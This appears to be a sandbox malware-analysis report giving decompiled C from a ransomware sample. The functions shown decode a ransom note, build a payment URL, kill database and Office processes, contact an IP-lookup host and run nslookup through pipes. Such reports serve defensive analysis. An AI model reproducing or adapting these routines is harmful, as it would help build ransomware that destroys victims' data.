				if(_t48 == 0 || 0x40 + _t87 * 2 >= _t83) {
					_t88 = 0;
				} else {
					_t88 = _t48;
				}
				E004069A0( &_v152, _t88);
				_t50 = E00407BA0(_t88, L"ransom_id=");
				_t51 = lstrlenW(L"ransom_id=");
				asm("movdqa xmm1, [0x410940]");
				_t68 = 0x412000;
				_t77 = 0xad;
				_t90 = _t50 + _t51 * 2;
				_t52 = 0xad0;
				_v240 = _t90;
				do {
					_t13 =  &(_t68[8]); // 0x44004e
					_t68 = _t13;
					asm("movdqu xmm0, [ecx-0x10]");
					asm("pxor xmm0, xmm1");
					asm("movdqu [ecx-0x10], xmm0");
					_t77 = _t77 - 1;
				} while (_t77 != 0);
				do {
					 *(_t52 + 0x412000) =  *(_t52 + 0x412000) ^ 0x00000005;
					_t52 = _t52 + 1;
				} while (_t52 < 0xad6);
				 *0x412b04 = 0x412000;
				_t84 = E00407BA0(0x412000, L"{USERID}");
				if(_t84 == 0) {
					L21:
					_v232 = 0x740068;
					_v228 = 0x700074;
					_v224 = 0x2f003a;
					_v220 = 0x67002f;
					_v216 = 0x630064;
					_v212 = 0x670062;
					_v208 = 0x760068;
					_v204 = 0x79006a;
					_v200 = 0x790071;
					_v196 = 0x6a0037;
					_v192 = 0x6c0063;
					_v188 = 0x2e006b;
					_v184 = 0x6e006f;
					_v180 = 0x6f0069;
					_v176 = 0x2e006e;
					_v172 = 0x6f0074;
					_v168 = 0x2f0070;
					_v164 = 0;
					_t113 =  *0x412ae4; // 0x8d0000
					if(_t113 == 0) {
						_t56 = VirtualAlloc(0, 0x400, 0x3000, 4);
						 *0x412ae4 = _t56;
						if(_t56 != 0) {
							wsprintfW(_t56, L"%s%s",  &_v232, _t90);
						}
					}
					VirtualFree(_v156, 0, 0x8000);
					_t44 = E00407720( &_v152);
					goto L25;
				}
				while(1) {
					L11:
					lstrcpyW(_t84, _t90);
					_t84[lstrlenW(_t84)] = 0x20;
					_t84 = 0x412000;
					_t60 =  *0x412000; // 0xfeff
					if(_t60 == 0) {
						goto L21;
					}
					_t73 = _t60 & 0x0000ffff;
					_t92 = 0x412000 - L"{USERID}";
					do {
						_t61 = L"{USERID}";
						if(_t73 == 0) {
							goto L19;
						}
						while(1) {
							_t74 =  *_t61 & 0x0000ffff;
							if(_t74 == 0) {
								break;
							}
							_t80 = ( *(_t92 + _t61) & 0x0000ffff) - _t74;
							if(_t80 != 0) {
								L18:
								if( *_t61 == 0) {
									break;
								}
								goto L19;
							}
							_t61 =  &(_t61[1]);
							if( *(_t92 + _t61) != _t80) {
								continue;
							}
							goto L18;
						}
						_t90 = _v236;
						goto L11;
						L19:
						_t20 =  &(_t84[1]); // 0x2d002d
						_t73 =  *_t20 & 0x0000ffff;
						_t84 =  &(_t84[1]);
						_t92 = _t92 + 2;
					} while (_t73 != 0);
					_t90 = _v236;
					goto L21;
				}
				goto L21;
			}

APIs

Part of subcall function 004039B0: GetProcessHeap.KERNEL32(?,?,00404587,00000000,?,00000000), ref: 00403A4C

Part of subcall function 00406D90: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 00406DB7
Part of subcall function 00406D90: GetUserNameW.ADVAPI32(00000000,?), ref: 00406DC8
Part of subcall function 00406D90: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 00406DE6
Part of subcall function 00406D90: GetComputerNameW.KERNEL32 ref: 00406DF0
Part of subcall function 00406D90: VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 00406E10
Part of subcall function 00406D90: wsprintfW.USER32 ref: 00406E51
Part of subcall function 00406D90: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 00406E6E
Part of subcall function 00406D90: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 00406E92
Part of subcall function 00406D90: RegQueryValueExW.ADVAPI32(00000000,LocaleName,00000000,00000000,?,?), ref: 00406EB6
Part of subcall function 00406D90: RegCloseKey.ADVAPI32(00000000), ref: 00406ED2

Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406BF2
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406BFD
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C13
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C1E
Part of subcall function 00406BA0: lstrlenW.KERNEL32(004048B6,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C34
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C3F
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C55
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C60
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C76
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C81
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C97
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CA2
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CC1
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CCC

VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0040410B
lstrlenW.KERNEL32(ransom_id=,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00404147
lstrcpyW.KERNEL32 ref: 004041C2
lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004041C9
VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 004042DE

Strings

d, xrefs: 0040425C
7, xrefs: 00404284
i, xrefs: 004042A4
%s%s, xrefs: 004042F3
t, xrefs: 004042B4
c, xrefs: 0040428C
t, xrefs: 00404244
b, xrefs: 00404264
o, xrefs: 0040429C
p, xrefs: 004042BC
h, xrefs: 0040426C
j, xrefs: 00404274
h, xrefs: 0040423C
{USERID}, xrefs: 0040419F, 004041ED, 004041F3
:, xrefs: 0040424C
ransom_id=, xrefs: 00404134, 00404140
k, xrefs: 00404294
/, xrefs: 00404254
n, xrefs: 004042AC
q, xrefs: 0040427C

Memory Dump Source

Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: lstrlen$AllocVirtual$Name$CloseComputerHeapOpenProcessQueryUserValuelstrcpywsprintf
String ID: %s%s$/$7$:$b$c$d$h$h$i$j$k$n$o$p$q$ransom_id=$t$t${USERID}
API String ID: 4100118565-914392996
Opcode ID: 9ef8ab6f65e3180621a96e978af0e414a349b7cd4cbb51f09f0a87e37010286e
Instruction ID: 44f1d7409a56cb0d5c487c66e452f22c269fbcb55178584459732c151bd8d75b
Opcode Fuzzy Hash: 9ef8ab6f65e3180621a96e978af0e414a349b7cd4cbb51f09f0a87e37010286e
Instruction Fuzzy Hash: E451F5B06143009AE7209F11DD0976B7BA5EBC0748F404A3EFA817B2D1E7B8AD55C79E

Uniqueness

Uniqueness Score: -1.00%

Function 00404640 Relevance: 47.4, APIs: 10, Strings: 17, Instructions: 114
processmemorystringCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E00404640() {
				char* _v12;
				char* _v16;
				char* _v20;
				char* _v24;
				char* _v28;
				char* _v32;
				char* _v36;
				char* _v40;
				char* _v44;
				char* _v48;
				char* _v52;
				char* _v56;
				char* _v60;
				char* _v64;
				char* _v68;
				char* _v72;
				char* _v76;
				char* _v80;
				char* _v84;
				char* _v88;
				char* _v92;
				char* _v96;
				char* _v100;
				char* _v104;
				char* _v108;
				char* _v112;
				char* _v116;
				char* _v120;
				char* _v124;
				char* _v128;
				char* _v132;
				char* _v136;
				char* _v140;
				char* _v144;
				char* _v148;
				char* _v152;
				char* _v156;
				char* _v160;
				char* _v164;
				void* _v172;
				int _t51;
				int _t52;
				void* _t60;
				WCHAR* _t62;
				void* _t65;
				void* _t70;
				signed int _t71;
				void* _t72;
				signed int _t74;
				void* _t76;

				_t76 = (_t74 & 0xfffffff8) - 0xa4;
				_v164 = L"msftesql.exe";
				_v160 = L"sqlagent.exe";
				_v156 = L"sqlbrowser.exe";
				_v152 = L"sqlservr.exe";
				_v148 = L"sqlwriter.exe";
				_v144 = L"oracle.exe";
				_v140 = L"ocssd.exe";
				_v136 = L"dbsnmp.exe";
				_v132 = L"synctime.exe";
				_v128 = L"mydesktopqos.exe";
				_v124 = L"agntsvc.exeisqlplussvc.exe";
				_v120 = L"xfssvccon.exe";
				_v116 = L"mydesktopservice.exe";
				_v112 = L"ocautoupds.exe";
				_v108 = L"agntsvc.exeagntsvc.exe";
				_v104 = L"agntsvc.exeencsvc.exe";
				_v100 = L"firefoxconfig.exe";
				_v96 = L"tbirdconfig.exe";
				_v92 = L"ocomm.exe";
				_v88 = L"mysqld.exe";
				_v84 = L"mysqld-nt.exe";
				_v80 = L"mysqld-opt.exe";
				_v76 = L"dbeng50.exe";
				_v72 = L"sqbcoreservice.exe";
				_v68 = L"excel.exe";
				_v64 = L"infopath.exe";
				_v60 = L"msaccess.exe";
				_v56 = L"mspub.exe";
				_v52 = L"onenote.exe";
				_v48 = L"outlook.exe";
				_v44 = L"powerpnt.exe";
				_v40 = L"steam.exe";
				_v36 = L"sqlservr.exe";
				_v32 = L"thebat.exe";
				_v28 = L"thebat64.exe";
				_v24 = L"thunderbird.exe";
				_v20 = L"visio.exe";
				_v16 = L"winword.exe";
				_v12 = L"wordpad.exe";
				_t70 = CreateToolhelp32Snapshot(2, 0);
				_v172 = _t70;
				_t60 = VirtualAlloc(0, 0x22c, 0x3000, 4);
				if(_t60 != 0) {
					 *_t60 = 0x22c;
					if(_t70 != 0xffffffff) {
						_push(_t60);
						Process32FirstW(_t70);
					}
				}
				_t41 = _t60 + 0x24; // 0x24
				_t62 = _t41;
				do {
					_t71 = 0;
					do {
						_t51 = lstrcmpiW( *(_t76 + 0x14 + _t71 * 4), _t62);
						if(_t51 == 0) {
							_t65 = OpenProcess(1, _t51,  *(_t60 + 8));
							if(_t65 != 0) {
								TerminateProcess(_t65, 0);
								CloseHandle(_t65);
							}
						}
						_t71 = _t71 + 1;
						_t46 = _t60 + 0x24; // 0x24
						_t62 = _t46;
					} while (_t71 < 0x27);
					_t72 = _v172;
					_t52 = Process32NextW(_t72, _t60);
					_t48 = _t60 + 0x24; // 0x24
					_t62 = _t48;
				} while (_t52 != 0);
				if(_t60 != 0) {
					VirtualFree(_t60, 0, 0x8000);
				}
				return CloseHandle(_t72);
			}

0x00404646
0x00404653
0x0040465b
0x00404663
0x0040466b
0x00404673
0x0040467b
0x00404683
0x0040468b
0x00404693
0x0040469b
0x004046a3
0x004046ab
0x004046b3
0x004046bb
0x004046c3
0x004046cb
0x004046d3
0x004046db
0x004046e3
0x004046eb
0x004046f3
0x004046fb
0x00404703
0x0040470b
0x00404713
0x0040471b
0x00404723
0x0040472e
0x00404739
0x00404744
0x0040474f
0x0040475a
0x00404765
0x00404770
0x0040477b
0x00404786
0x00404791
0x0040479c
0x004047a7
0x004047c4
0x004047c8
0x004047d2
0x004047d6
0x004047d8
0x004047e1
0x004047e3
0x004047e5
0x004047e5
0x004047e1
0x004047f1
0x004047f1
0x004047f4
0x004047f4
0x00404800
0x00404805
0x0040480d
0x0040481b
0x0040481f
0x00404824
0x00404831
0x00404831
0x0040481f
0x0040483b
0x0040483c
0x0040483c
0x0040483f
0x00404844
0x0040484a
0x00404850
0x00404850
0x00404853
0x00404859
0x00404863
0x00404863
0x00404872

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 004047B2
VirtualAlloc.KERNEL32(00000000,0000022C,00003000,00000004), ref: 004047CC
Process32FirstW.KERNEL32(00000000,00000000), ref: 004047E5
lstrcmpiW.KERNEL32(00000002,00000024), ref: 00404805
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00404815
TerminateProcess.KERNEL32(00000000,00000000), ref: 00404824
CloseHandle.KERNEL32(00000000), ref: 00404831
Process32NextW.KERNEL32(?,00000000), ref: 0040484A
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00404863
CloseHandle.KERNEL32(?), ref: 0040486A

Strings

L@, xrefs: 0040472E
(@, xrefs: 0040479C
@, xrefs: 0040465B
\@, xrefs: 0040466B
8@, xrefs: 004046DB
l@, xrefs: 004046EB
P@, xrefs: 004046AB
<@, xrefs: 00404663
X@, xrefs: 004046E3
x@, xrefs: 00404744
`@, xrefs: 00404739
@@, xrefs: 004047A7
x@, xrefs: 00404673
l@, xrefs: 004046B3
0@, xrefs: 00404723
@, xrefs: 004046CB
\@, xrefs: 00404765

Memory Dump Source

Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: CloseHandleProcessProcess32Virtual$AllocCreateFirstFreeNextOpenSnapshotTerminateToolhelp32lstrcmpi
String ID: @$(@$0@$8@$<@$@@$L@$P@$X@$\@$\@$`@$l@$l@$x@$x@$@
API String ID: 3586910739-3725814736
Opcode ID: 9888b97dcf90e8f6efa24b4065dea21d40555a31716fc4df83624dfcfe3835c8
Instruction ID: 5199461c7d7482eac4530f3025dd1142b0b19823d44abf373f40a8b8b0f494f1
Opcode Fuzzy Hash: 9888b97dcf90e8f6efa24b4065dea21d40555a31716fc4df83624dfcfe3835c8
Instruction Fuzzy Hash: 41515CB51083409FE7209F12994874BBBE4ABC5708F508D3EE6943B2D1D7B88819CF9E

Uniqueness

Uniqueness Score: -1.00%

Function 00407A00 Relevance: 45.6, APIs: 13, Strings: 13, Instructions: 132
networkfilememoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407A00(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16, void* _a20, intOrPtr _a24, WCHAR* _a36, WCHAR* _a40, long _a44) {
				long _v8;
				void* _v12;
				void* _v16;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				short _v64;
				void* _t38;
				void* _t40;
				long _t55;
				long _t60;
				WCHAR* _t63;
				void* _t64;
				void* _t65;
				void* _t66;
				void* _t68;

				_t65 = __ecx;
				_t38 =  *(__ecx + 4);
				if(_t38 != 0) {
					InternetCloseHandle(_t38);
				}
				E004077F0(_t65);
				_t40 = InternetConnectW( *(_t65 + 4), _a4, 0x50, 0, 0, 3, 0, 0);
				_t66 = _t40;
				_v8 = 0;
				_v12 = _t66;
				if(_t66 != 0) {
					_t63 = VirtualAlloc(0, 0x2800, 0x3000, 0x40);
					_v16 = _t63;
					wsprintfW(_t63, L"%s", _a8);
					_t64 = HttpOpenRequestW(_t66, _a36, _t63, L"HTTP/1.1", 0, 0, 0x8404f700, 0);
					if(_t64 != 0) {
						_v64 = 0x6f0048;
						_v20 = 0;
						_v60 = 0x740073;
						_v56 = 0x20003a;
						_v52 = 0x6f006e;
						_v48 = 0x6f006d;
						_v44 = 0x650072;
						_v40 = 0x610072;
						_v36 = 0x73006e;
						_v32 = 0x6d006f;
						_v28 = 0x62002e;
						_v24 = 0x740069;
						if(HttpAddRequestHeadersW(_t64,  &_v64, 0xffffffff, 0) != 0) {
							if(HttpSendRequestW(_t64, _a40, _a44, _a12, _a16) == 0) {
								GetLastError();
							} else {
								_t68 = _a20;
								_t60 = _a24 - 1;
								_a4 = 0;
								if(InternetReadFile(_t64, _t68, _t60,  &_a4) != 0) {
									while(1) {
										_t55 = _a4;
										if(_t55 == 0) {
											goto L13;
										}
										 *((char*)(_t55 + _t68)) = 0;
										_a4 = 0;
										_v8 = 1;
										if(InternetReadFile(_t64, _t68, _t60,  &_a4) != 0) {
											continue;
										} else {
										}
										goto L13;
									}
								}
							}
						}
					}
					L13:
					InternetCloseHandle(_t64);
					InternetCloseHandle(_v12);
					VirtualFree(_v16, 0, 0x8000);
					return _v8;
				} else {
					return _t40;
				}
			}

APIs

InternetCloseHandle.WININET(?), ref: 00407A13
InternetConnectW.WININET(?,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 00407A32
VirtualAlloc.KERNEL32(00000000,00002800,00003000,00000040,?,?,?,?,?,?,?,?,00406946,ipv4bot.whatismyipaddress.com,004103B0,00000000), ref: 00407A5F
wsprintfW.USER32 ref: 00407A73
HttpOpenRequestW.WININET(00000000,?,00000000,HTTP/1.1,00000000,00000000,8404F700,00000000), ref: 00407A91
HttpAddRequestHeadersW.WININET(00000000,006F0048,000000FF,00000000), ref: 00407AFC
HttpSendRequestW.WININET(00000000,006F006D,006F006E,00000000,00740069), ref: 00407B13
InternetReadFile.WININET(00000000,0062002E,006D006E,00000000), ref: 00407B32
InternetReadFile.WININET(00000000,0062002E,006D006E,00000000), ref: 00407B60
GetLastError.KERNEL32 ref: 00407B6C
InternetCloseHandle.WININET(00000000), ref: 00407B79
InternetCloseHandle.WININET(00000000), ref: 00407B7E
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,00406946,ipv4bot.whatismyipaddress.com), ref: 00407B8A

Strings

n, xrefs: 00407AC4
i, xrefs: 00407AF5
m, xrefs: 00407ACB
s, xrefs: 00407AB6
r, xrefs: 00407AD2
HTTP/1.1, xrefs: 00407A87
H, xrefs: 00407AA3
r, xrefs: 00407AD9
:, xrefs: 00407ABD
n, xrefs: 00407AE0
o, xrefs: 00407AE7
., xrefs: 00407AEE
Fi@, xrefs: 00407B1D

Memory Dump Source

Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttpRequest$FileReadVirtual$AllocConnectErrorFreeHeadersLastOpenSendwsprintf
String ID: .$:$Fi@$H$HTTP/1.1$i$m$n$n$o$r$r$s
API String ID: 3906118045-996335725
Opcode ID: c8dddac5ca2f289de5ab4859de8dc5ee87e9a581b745c866a59695c1e2178a40
Instruction ID: 138ab0025d8835c4ee6cf1b85085083e902cc9d23406ca5e2eb97d724ccf74a6
Opcode Fuzzy Hash: c8dddac5ca2f289de5ab4859de8dc5ee87e9a581b745c866a59695c1e2178a40
Instruction Fuzzy Hash: AD418371A00209BBEB109F51DD49FDE7FB9FF04754F10402AFA04BA2A1C7B5A950CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00404186 Relevance: 42.1, APIs: 5, Strings: 19, Instructions: 96
stringmemoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404186(void* __eax, void* __ebp, WCHAR* _a12, char _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, intOrPtr _a60, intOrPtr _a64, intOrPtr _a68, intOrPtr _a72, intOrPtr _a76, intOrPtr _a80, short _a84, void* _a92, char _a96) {
				void* _t31;
				void* _t35;
				WCHAR* _t36;
				signed short _t40;
				signed short* _t41;
				signed int _t46;
				signed int _t47;
				void* _t50;
				WCHAR* _t51;
				WCHAR* _t53;
				void* _t56;
				WCHAR* _t72;

				_t31 = __eax;
				do {
					 *(_t31 + 0x412000) =  *(_t31 + 0x412000) ^ 0x00000005;
					_t31 = _t31 + 1;
				} while (_t31 < 0xad6);
				 *0x412b04 = 0x412000;
				_t51 = E00407BA0(0x412000, L"{USERID}");
				if(_t51 != 0) {
					while(1) {
						L4:
						lstrcpyW(_t51, _t53);
						_t51[lstrlenW(_t51)] = 0x20;
						_t51 = 0x412000;
						_t40 =  *0x412000; // 0xfeff
						if(_t40 == 0) {
							goto L14;
						}
						_t46 = _t40 & 0x0000ffff;
						_t56 = 0x412000 - L"{USERID}";
						do {
							_t41 = L"{USERID}";
							if(_t46 == 0) {
								goto L12;
							} else {
								while(1) {
									_t47 =  *_t41 & 0x0000ffff;
									if(_t47 == 0) {
										break;
									}
									_t50 = ( *(_t56 + _t41) & 0x0000ffff) - _t47;
									if(_t50 != 0) {
										L11:
										if( *_t41 == 0) {
											break;
										} else {
											goto L12;
										}
									} else {
										_t41 =  &(_t41[1]);
										if( *(_t56 + _t41) != _t50) {
											continue;
										} else {
											goto L11;
										}
									}
									goto L14;
								}
								_t53 = _a12;
								goto L4;
							}
							goto L14;
							L12:
							_t7 =  &(_t51[1]); // 0x2d002d
							_t46 =  *_t7 & 0x0000ffff;
							_t51 =  &(_t51[1]);
							_t56 = _t56 + 2;
						} while (_t46 != 0);
						_t53 = _a12;
						goto L14;
					}
				}
				L14:
				_a16 = 0x740068;
				_a20 = 0x700074;
				_a24 = 0x2f003a;
				_a28 = 0x67002f;
				_a32 = 0x630064;
				_a36 = 0x670062;
				_a40 = 0x760068;
				_a44 = 0x79006a;
				_a48 = 0x790071;
				_a52 = 0x6a0037;
				_a56 = 0x6c0063;
				_a60 = 0x2e006b;
				_a64 = 0x6e006f;
				_a68 = 0x6f0069;
				_a72 = 0x2e006e;
				_a76 = 0x6f0074;
				_a80 = 0x2f0070;
				_a84 = 0;
				_t72 =  *0x412ae4; // 0x8d0000
				if(_t72 == 0) {
					_t36 = VirtualAlloc(0, 0x400, 0x3000, 4);
					 *0x412ae4 = _t36;
					if(_t36 != 0) {
						wsprintfW(_t36, L"%s%s",  &_a16, _t53);
					}
				}
				VirtualFree(_a92, 0, 0x8000);
				_t35 = E00407720( &_a96);
				return _t35;
			}

APIs

lstrcpyW.KERNEL32 ref: 004041C2
lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004041C9
VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 004042DE
wsprintfW.USER32 ref: 004042F9
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0040430D

Strings

d, xrefs: 0040425C
7, xrefs: 00404284
i, xrefs: 004042A4
%s%s, xrefs: 004042F3
t, xrefs: 004042B4
c, xrefs: 0040428C
t, xrefs: 00404244
b, xrefs: 00404264
o, xrefs: 0040429C
p, xrefs: 004042BC
h, xrefs: 0040426C
j, xrefs: 00404274
h, xrefs: 0040423C
{USERID}, xrefs: 0040419F, 004041ED, 004041F3
:, xrefs: 0040424C
k, xrefs: 00404294
/, xrefs: 00404254
n, xrefs: 004042AC
q, xrefs: 0040427C

Memory Dump Source

Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFreelstrcpylstrlenwsprintf
String ID: %s%s$/$7$:$b$c$d$h$h$i$j$k$n$o$p$q$t$t${USERID}
API String ID: 4033391921-198931148
Opcode ID: 6847579bacb329ad28de8d3bfebd4ba97bf46600428eaa1bedf2c707f040ed1e
Instruction ID: b72f1aa0908df0bbc044f05aee074301ccc00ff49c2eba455c4c048f303cf63e
Opcode Fuzzy Hash: 6847579bacb329ad28de8d3bfebd4ba97bf46600428eaa1bedf2c707f040ed1e
Instruction Fuzzy Hash: C241D2B02043008BD7209F11995836BBAF1FFC5788F40892DFA85AB291D7B99955CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00404D60 Relevance: 40.4, APIs: 8, Strings: 15, Instructions: 101
pipememoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404D60(CHAR* __ecx, void* __edx) {
				struct _SECURITY_ATTRIBUTES _v16;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				short _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t37;
				CHAR* _t43;
				void* _t45;

				_v76 = 0x73006e;
				_v20 = 0;
				_t37 = __edx;
				_v16.lpSecurityDescriptor = 0;
				_t43 = __ecx;
				_v72 = 0x6f006c;
				_v68 = 0x6b006f;
				_v64 = 0x700075;
				_v60 = 0x250020;
				_v56 = 0x200053;
				_v52 = 0x6e0064;
				_v48 = 0x310073;
				_v44 = 0x73002e;
				_v40 = 0x70006f;
				_v36 = 0x6f0072;
				_v32 = 0x6e0064;
				_v28 = 0x2e0073;
				_v24 = 0x750072;
				_v16.nLength = 0xc;
				_v16.bInheritHandle = 1;
				_t24 = CreatePipe(0x412b10, 0x412b0c,  &_v16, 0);
				if(_t24 != 0) {
					_t24 = SetHandleInformation( *0x412b10, 1, 0);
					if(_t24 == 0) {
						goto L1;
					} else {
						CreatePipe(0x412b08, 0x412b14,  &_v16, 0);
						_t24 = SetHandleInformation( *0x412b14, 1, 0);
						if(_t24 == 0) {
							goto L1;
						} else {
							_t45 = VirtualAlloc(0, 0x2800, 0x3000, 4);
							if(_t45 == 0) {
								lstrcpyA(_t43, "fabian wosar <3");
								return 0;
							} else {
								wsprintfW(_t45,  &_v76, _t37);
								E00404B10(_t45);
								E00404CB0(_t37, _t43, _t37, _t43, _t45);
								VirtualFree(_t45, 0, 0x8000);
								return 0;
							}
						}
					}
				} else {
					L1:
					return _t24 | 0xffffffff;
				}
			}

0x00404d6b
0x00404d73
0x00404d77
0x00404d79
0x00404d7c
0x00404d81
0x00404d93
0x00404d9a
0x00404da1
0x00404da8
0x00404daf
0x00404db6
0x00404dbd
0x00404dc4
0x00404dcb
0x00404dd2
0x00404dd9
0x00404de0
0x00404de7
0x00404dee
0x00404df5
0x00404dfd
0x00404e19
0x00404e1d
0x00000000
0x00404e1f
0x00404e2f
0x00404e3f
0x00404e43
0x00000000
0x00404e45
0x00404e59
0x00404e5d
0x00404e9b
0x00404ea9
0x00404e5f
0x00404e65
0x00404e70
0x00404e79
0x00404e86
0x00404e94
0x00404e94
0x00404e5d
0x00404e43
0x00404dff
0x00404dff
0x00404e08
0x00404e08

APIs

CreatePipe.KERNEL32(00412B10,00412B0C,?,00000000,00000000,00000001,00000000), ref: 00404DF5
SetHandleInformation.KERNEL32(00000001,00000000), ref: 00404E19
CreatePipe.KERNEL32(00412B08,00412B14,0000000C,00000000), ref: 00404E2F
SetHandleInformation.KERNEL32(00000001,00000000), ref: 00404E3F
VirtualAlloc.KERNEL32(00000000,00002800,00003000,00000004), ref: 00404E53
wsprintfW.USER32 ref: 00404E65
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00404E86

Strings

n, xrefs: 00404D6B
u, xrefs: 00404D9A
, xrefs: 00404DA1
